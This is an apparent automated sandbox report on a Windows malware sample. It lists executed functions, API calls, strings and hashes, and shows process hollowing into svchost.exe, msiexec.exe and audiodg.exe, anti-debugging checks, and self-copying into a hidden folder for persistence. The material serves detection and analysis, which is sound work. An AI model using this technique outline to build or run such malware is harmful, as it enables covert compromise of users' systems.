Function_00007FF7E83C35B9 108 Function_00007FF7E83CBFB8 109 Function_00007FF7E83C36BC 110 Function_00007FF7E83CB0D5 113 Function_00007FF7E83CB2C8 114->26 114->50 114->84

                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                        Function 00007FF7E83C24CC Relevance: 66.9, APIs: 34, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 231 7ff7e83c24cc-7ff7e83c2546 GetModuleFileNameW 232 7ff7e83c2548 231->232 233 7ff7e83c254d-7ff7e83c2589 231->233 236 7ff7e83c2df1-7ff7e83c2df9 232->236 234 7ff7e83c25a1-7ff7e83c25bd call 7ff7e83c240c 233->234 235 7ff7e83c258b-7ff7e83c2593 233->235 245 7ff7e83c2600-7ff7e83c260a 234->245 237 7ff7e83c25bf-7ff7e83c25db call 7ff7e83c244c 235->237 238 7ff7e83c2595-7ff7e83c259d 235->238 237->245 240 7ff7e83c259f-7ff7e83c25fb 238->240 241 7ff7e83c25dd-7ff7e83c25f9 call 7ff7e83c248c 238->241 240->236 241->245 249 7ff7e83c2611-7ff7e83c2665 CreateProcessW 245->249 250 7ff7e83c260c 245->250 251 7ff7e83c2667 249->251 252 7ff7e83c266c-7ff7e83c26ac CreateFileW 249->252 250->236 251->236 253 7ff7e83c26b3-7ff7e83c26cf GetFileSize 252->253 254 7ff7e83c26ae 252->254 255 7ff7e83c26d1-7ff7e83c26d9 253->255 256 7ff7e83c26db-7ff7e83c26e6 CloseHandle 253->256 254->236 255->256 257 7ff7e83c26eb-7ff7e83c2713 VirtualAlloc 255->257 256->236 258 7ff7e83c2725-7ff7e83c2750 ReadFile 257->258 259 7ff7e83c2715-7ff7e83c2720 CloseHandle 257->259 260 7ff7e83c2752-7ff7e83c2770 VirtualFree CloseHandle 258->260 261 7ff7e83c2775-7ff7e83c27c3 CloseHandle GetThreadContext 258->261 259->236 260->236 262 7ff7e83c27c5-7ff7e83c27d8 VirtualFree 261->262 263 7ff7e83c27dd-7ff7e83c2862 ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 261->263 262->236 264 7ff7e83c2864-7ff7e83c2877 VirtualFree 263->264 265 7ff7e83c287c-7ff7e83c28e5 VirtualAllocEx 263->265 264->236 266 7ff7e83c28ff-7ff7e83c2933 WriteProcessMemory 265->266 267 7ff7e83c28e7-7ff7e83c28fa VirtualFree 265->267 268 7ff7e83c2935-7ff7e83c2948 VirtualFree 266->268 269 7ff7e83c294d-7ff7e83c2958 266->269 267->236 268->236 270 7ff7e83c296a-7ff7e83c297d 269->270 271 7ff7e83c2983-7ff7e83c2a0c WriteProcessMemory 270->271 272 7ff7e83c2a2b-7ff7e83c2a72 270->272 273 7ff7e83c2a26 271->273 274 7ff7e83c2a0e-7ff7e83c2a21 VirtualFree 271->274 275 7ff7e83c2a84-7ff7e83c2a97 272->275 273->270 274->236 277 7ff7e83c2a9d-7ff7e83c2aec RtlCompareMemory 275->277 278 7ff7e83c2d1c-7ff7e83c2da0 WriteProcessMemory SetThreadContext 275->278 279 7ff7e83c2af0-7ff7e83c2b19 277->279 280 7ff7e83c2aee 277->280 281 7ff7e83c2da2-7ff7e83c2db5 VirtualFree 278->281 282 7ff7e83c2db7-7ff7e83c2dc7 ResumeThread 278->282 284 7ff7e83c2b24-7ff7e83c2b32 279->284 280->275 281->236 285 7ff7e83c2dc9-7ff7e83c2ddc VirtualFree 282->285 286 7ff7e83c2dde-7ff7e83c2deb VirtualFree 282->286 287 7ff7e83c2b38-7ff7e83c2bc3 284->287 288 7ff7e83c2d17 284->288 285->236 286->236 289 7ff7e83c2bd5-7ff7e83c2be3 287->289 288->278 290 7ff7e83c2d12 289->290 291 7ff7e83c2be9-7ff7e83c2c1c 289->291 290->284 292 7ff7e83c2c20-7ff7e83c2cf3 ReadProcessMemory WriteProcessMemory 291->292 293 7ff7e83c2c1e 291->293 295 7ff7e83c2cf5-7ff7e83c2d08 VirtualFree 292->295 296 7ff7e83c2d0d 292->296 293->289 295->236 296->290
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileModuleName
                                                                                                                                                                                                                        • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                        • API String ID: 514040917-3001742581
                                                                                                                                                                                                                        • Opcode ID: cc9545668cbfd8d8ccb1ce63d766c7a505e34b9cdb4d5a45164daabb5f3f8071
                                                                                                                                                                                                                        • Instruction ID: dfcff3b680d66856395131fc5d7c82f8fb8c363b743f1db0dc019a48c5fc086b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc9545668cbfd8d8ccb1ce63d766c7a505e34b9cdb4d5a45164daabb5f3f8071
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B32F832608AC18AE770DB15E8547AEF3A0FBD8B45F44413ADA8D83B58DF7CD5448B25
                                                                                                                                                                                                                        Function 00007FF7E83C340C Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 297 7ff7e83c340c-7ff7e83c3422 call 7ff7e83c153c call 7ff7e83c31ac 302 7ff7e83c3424-7ff7e83c3426 ExitProcess 297->302 303 7ff7e83c342c-7ff7e83c345a call 7ff7e83c40a4 call 7ff7e83c3ca4 call 7ff7e83c3ed4 297->303 310 7ff7e83c345c-7ff7e83c346d call 7ff7e83c41e4 303->310 311 7ff7e83c34ab-7ff7e83c34be call 7ff7e83c3ed4 303->311 316 7ff7e83c3482-7ff7e83c3484 ExitProcess 310->316 317 7ff7e83c346f-7ff7e83c3480 call 7ff7e83c41e4 310->317 318 7ff7e83c34c0-7ff7e83c34d1 call 7ff7e83c41e4 311->318 319 7ff7e83c34fc-7ff7e83c350f call 7ff7e83c3ed4 311->319 317->316 326 7ff7e83c348a call 7ff7e83c329c 317->326 329 7ff7e83c34d3-7ff7e83c34d5 ExitProcess 318->329 330 7ff7e83c34db call 7ff7e83c320c 318->330 327 7ff7e83c3552-7ff7e83c3568 call 7ff7e83c3a34 call 7ff7e83c339c 319->327 328 7ff7e83c3511-7ff7e83c3522 call 7ff7e83c41e4 319->328 337 7ff7e83c348f-7ff7e83c3494 326->337 348 7ff7e83c356a-7ff7e83c357b call 7ff7e83c41e4 327->348 349 7ff7e83c35be-7ff7e83c3696 CreateThread * 3 WaitForMultipleObjects ExitProcess 327->349 344 7ff7e83c3524-7ff7e83c3526 ExitProcess 328->344 345 7ff7e83c352c call 7ff7e83c320c 328->345 335 7ff7e83c34e0-7ff7e83c34e5 330->335 339 7ff7e83c34f4-7ff7e83c34f6 ExitProcess 335->339 340 7ff7e83c34e7-7ff7e83c34f2 Sleep 335->340 342 7ff7e83c3496-7ff7e83c34a1 Sleep 337->342 343 7ff7e83c34a3-7ff7e83c34a5 ExitProcess 337->343 340->335 342->337 350 7ff7e83c3531-7ff7e83c3536 345->350 355 7ff7e83c3590-7ff7e83c3592 ExitProcess 348->355 356 7ff7e83c357d-7ff7e83c358e call 7ff7e83c41e4 348->356 352 7ff7e83c3545-7ff7e83c3547 ExitProcess 350->352 353 7ff7e83c3538-7ff7e83c3543 Sleep 350->353 353->350 356->355 359 7ff7e83c3598 call 7ff7e83c329c 356->359 361 7ff7e83c359d-7ff7e83c35a2 359->361 362 7ff7e83c35b1-7ff7e83c35b3 ExitProcess 361->362 363 7ff7e83c35a4-7ff7e83c35af Sleep 361->363 363->361
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                        • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                        • API String ID: 613740775-1953711635
                                                                                                                                                                                                                        • Opcode ID: 4720ab846c958fcdba8f4a98c12d44e859591572f9a63126b29549f3c54c881b
                                                                                                                                                                                                                        • Instruction ID: 596846811972ee949e4f7bccd99658e432d162dc3d76375e02d39af269640bd2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4720ab846c958fcdba8f4a98c12d44e859591572f9a63126b29549f3c54c881b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7061FC21A18A5285EA64FB31E85537DF2A0BF64300FC8053FD54E865A5DE3DE509C73A
                                                                                                                                                                                                                        Function 00007FF7E83C40A4 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 434396405-0
                                                                                                                                                                                                                        • Opcode ID: 8b899918add7223f465711b73e7ae69a3ba479ef6b9dac702c2211ef63433b4c
                                                                                                                                                                                                                        • Instruction ID: 2faf70fcbe60861975b565da129737a68644bcc099d9e604006fd223ba227186
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b899918add7223f465711b73e7ae69a3ba479ef6b9dac702c2211ef63433b4c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A311732A1CA8186E750EB15E85072EF7A0FBE4780F54503AFA8E43B68DF3DD4418B25
                                                                                                                                                                                                                        Function 00007FF7E83C31AC Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3920101602-0
                                                                                                                                                                                                                        • Opcode ID: a6f9905a68a37330863b423cf03472073815be279c54a0a408a746d7c81f1aaa
                                                                                                                                                                                                                        • Instruction ID: 5b1fee75b434fa0edca83a36c5ff8517d6b4ec7c120358d072d333dce567417c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6f9905a68a37330863b423cf03472073815be279c54a0a408a746d7c81f1aaa
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 71F0541590C18285EB30B715680433DF790BB69708F88157AD58D055A5CF3CD609CF3B
                                                                                                                                                                                                                        Function 00007FF7E83C14EC Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 422 7ff7e83c14ec-7ff7e83c1528 LoadLibraryA GetProcAddress
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,00007FF7E83C15F1,?,?,?,?,?,?,?,?,00007FF7E83C3418), ref: 00007FF7E83C14FF
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,00007FF7E83C15F1,?,?,?,?,?,?,?,?,00007FF7E83C3418), ref: 00007FF7E83C1514
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2574300362-0
                                                                                                                                                                                                                        • Opcode ID: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction ID: 3cdb3e5c05266597902de9561afa6790c4269cad5f47727d64a9500bd7262fe8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7E09276508F80D6C620AB15F84015EB7B4FBC8794F944125EACD42B28CF3CC269CB14
                                                                                                                                                                                                                        Function 00007FF7E83C3884 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3704: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7E83C3744
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3704: GetVolumeInformationW.KERNELBASE ref: 00007FF7E83C37C1
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3704: wsprintfW.USER32 ref: 00007FF7E83C3862
                                                                                                                                                                                                                        • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C38CD
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C38E2
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C38F5
                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3905
                                                                                                                                                                                                                        • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3918
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C392D
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3940
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3955
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: 1b61880e004d43661280f0cb070f80f860ebf9c3e77f95e2088ce91db1cafed7
                                                                                                                                                                                                                        • Instruction ID: bcda5de7ac1e48998e5049fa36798880b83ec74535c57f7083d3c8ae5816b956
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b61880e004d43661280f0cb070f80f860ebf9c3e77f95e2088ce91db1cafed7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B114F3562898685DB60AB25F86436EF361FBD8744F85603ADA4E43E28DF3CD108C769
                                                                                                                                                                                                                        Function 00007FF7E83C3A34 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3704: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7E83C3744
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3704: GetVolumeInformationW.KERNELBASE ref: 00007FF7E83C37C1
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3704: wsprintfW.USER32 ref: 00007FF7E83C3862
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C38CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C38E2
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C38F5
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3905
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3918
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C392D
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3940
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3955
                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32 ref: 00007FF7E83C3A79
                                                                                                                                                                                                                        • DeleteFileW.KERNELBASE ref: 00007FF7E83C3A84
                                                                                                                                                                                                                        • CopyFileW.KERNELBASE ref: 00007FF7E83C3A9D
                                                                                                                                                                                                                        • SetFileAttributesW.KERNELBASE ref: 00007FF7E83C3AB5
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: Services
                                                                                                                                                                                                                        • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                        • Opcode ID: 163988942e6ae4ff26b83112ee0362cfd600fbc072332237c5b9d851307db1dc
                                                                                                                                                                                                                        • Instruction ID: 4fb6649795aeb34c28ef6f20e768935f681dc1314c2ffb1fe4f2a8c442210b4c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 163988942e6ae4ff26b83112ee0362cfd600fbc072332237c5b9d851307db1dc
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E018861A1858252DB50EB24E8543AEF360FBA4744FD4503BD24D835B4EE3CD20ACB25
                                                                                                                                                                                                                        Function 00007FF7E83C3704 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                        • API String ID: 3001812590-640692576
                                                                                                                                                                                                                        • Opcode ID: 1f59420b8f827cfb11394142374efd971ec66bac13221c6480dae27b971b1b6b
                                                                                                                                                                                                                        • Instruction ID: 8b7f76e87300aade8f7939bcd8d79fcab0e34d6c7a06bac65964dd50d826c568
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f59420b8f827cfb11394142374efd971ec66bac13221c6480dae27b971b1b6b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A31D92661C6C186DB30EB64E4983AEF3A0FB94704F90113AE68D87A68DB7DD509CB15
                                                                                                                                                                                                                        Function 00007FF7E83C3974 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
